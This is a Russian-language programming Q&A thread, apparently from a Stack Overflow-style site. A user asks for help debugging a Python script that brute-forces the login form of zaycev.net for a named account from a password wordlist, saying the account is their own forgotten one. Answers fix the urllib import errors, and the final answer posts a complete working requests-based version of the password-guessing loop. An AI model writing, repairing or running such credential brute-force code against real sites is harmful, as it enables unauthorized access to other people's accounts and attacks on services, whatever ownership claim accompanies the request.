# AttributeError: module 'urllib' has no attribute 'request'

Tags: python, python-3.x, requests, urllib

Хочу вспомнить пароль от своего старого аккаунта. Регался давно.Почту не помню.Решил подобрать пароль.

```
#!/usr/bin/python3

import urllib
import urllib.parse

url = "http://zaycev.net/auth/login.php?badCredentials=2"

username = "mokushi"
listaPassword = "list.txt"

pwd = []
f = open(listaPassword, "r")
pwd = f.readlines()
f.close()

for i in range(0, len(pwd)):
    if pwd[i][len(pwd[i])-1] == '\n':
        pwd[i] = pwd[i][0:len(pwd[i])-1]

messaggioDiErrore = "Неверная почта или логин"

for password in pwd:
    print("Trying the pass:", password)
    parametriDaTestare = { "j_username" : username, "j_password" : password, "login" : "1" }
    p = urllib.parse.urlencode(parametriDaTestare)
    paginaDiAction = urllib.request.urlopen(url, p)
    risultato = paginaDiAction.read()
    if not(messaggioDiErrore in risultato):
        print("Password found:", password)
        break
```

Выдаётся :

> `Trying the pass: karakulo`
>   `Traceback (most recent call last):`
>    `File "find_my_pass.py", line 26, in <module>`
>      `paginaDiAction = urllib.request.urlopen(url, p)`
>   `AttributeError: module 'urllib' has no attribute 'request'`

В чём моя ошибка ?

---

Используй requests

Так?

```
import urllib.parse
import requests

url = "http://zaycev.net/auth/login.php?badCredentials=2"

username = "mokushi"
listaPassword = "list.txt"

pwd = []
f = open(listaPassword, "r")
pwd = f.readlines()
f.close()

for i in range(0, len(pwd)):
    if pwd[i][len(pwd[i])-1] == '\n':
        pwd[i] = pwd[i][0:len(pwd[i])-1]

messaggioDiErrore = "Неверная почта или логин"

for password in pwd:
    print("Trying the pass:", password)
    parametriDaTestare = { "j_username" : username, "j_password" : password, "login" : "1" }
    p = urllib.parse.urlencode(parametriDaTestare)
    paginaDiAction = requests.post(url, p)
    risultato = paginaDiAction.text
    if not(messaggioDiErrore in risultato):
        print("Password found:", password)
        break
```

Т.е нужно будет импортировать urllib.parse и urllib.request ? При <---
появляется такая ошибка:

> TypeError: POST data should be bytes, an
>   iterable of bytes, or a file object. It cannot be of type str.

Попробовал так :

```
#!/usr/bin/python3

import urllib.request
import urllib.parse

url = "http://zaycev.net/auth/login.php?badCredentials=2"

username = "mokushi"
listaPassword = "list.txt"

pwd = []
f = open(listaPassword, "r")
pwd = f.readlines()
f.close()

for i in range(0, len(pwd)):
    if pwd[i][len(pwd[i])-1] == '\n':
        pwd[i] = pwd[i][0:len(pwd[i])-1]

messaggioDiErrore = "Неверная почта или логин"

for password in pwd:
    print("Trying the pass:", password)
    parametriDaTestare = { "j_username" : username, "j_password" : password, "login" : "1" }
    p = urllib.parse.urlencode(parametriDaTestare)
    binary = p.encode('utf-8')
    paginaDiAction = urllib.request.urlopen(url, binary)
    risultato = paginaDiAction.read()
    if not(messaggioDiErrore in risultato):
        print("Password found:", password)
        break
```

Выдаётся другая ошибка. Но ведь str был переведён в byte... :

> TypeError: a bytes-like object is required, not 'str'

Comment: Используй requests(библиотека)

Answer (score 4):

```
>>> import urllib
>>> urllib.request
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'request'
module 'urllib' has no attribute 'request'
```

[`urllib`](https://docs.python.org/3/library/urllib.html) это Питон-пакет. Чтобы использовать модуль [`urllib.request`](https://docs.python.org/3/library/urllib.request.html#module-urllib.request), его необходимо импортировать:

```
>>> import urllib.request
>>> urllib.request
<module 'urllib.request' from '.../lib/python3.6/urllib/request.py'>
```

Comment: Т.е нужно будет импортировать urllib.parse и urllib.request ? При <--- появляется такая ошибка : TypeError: POST data should be bytes, an iterable of bytes, or a file object. It cannot be of type str.

Answer (score 0):

## С помощью *requests*

С помощью *requests* будет проще:

```py
import requests

url = "http://zaycev.net/auth/login.php"

username = "mokushi"
listaPassword = "list.txt"

pwd = []
f = open(listaPassword, "r")
pwd = f.readlines()
f.close()

for i in range(0, len(pwd)):
    if pwd[i][len(pwd[i])-1] == '\n':
        pwd[i] = pwd[i][0:len(pwd[i])-1]

messaggioDiErrore = "Неверная почта или логин"

for password in pwd:
    print("Trying the pass:", password)
    parametriDaTestare = { "j_username" : username, "j_password" : password, "login" : "1" , "badCredentials": 2}
    paginaDiAction = requests.post(url, params=parametriDaTestare)
    risultato = paginaDiAction.text
    if not(messaggioDiErrore in risultato):
        print("Password found:", password)
        break
```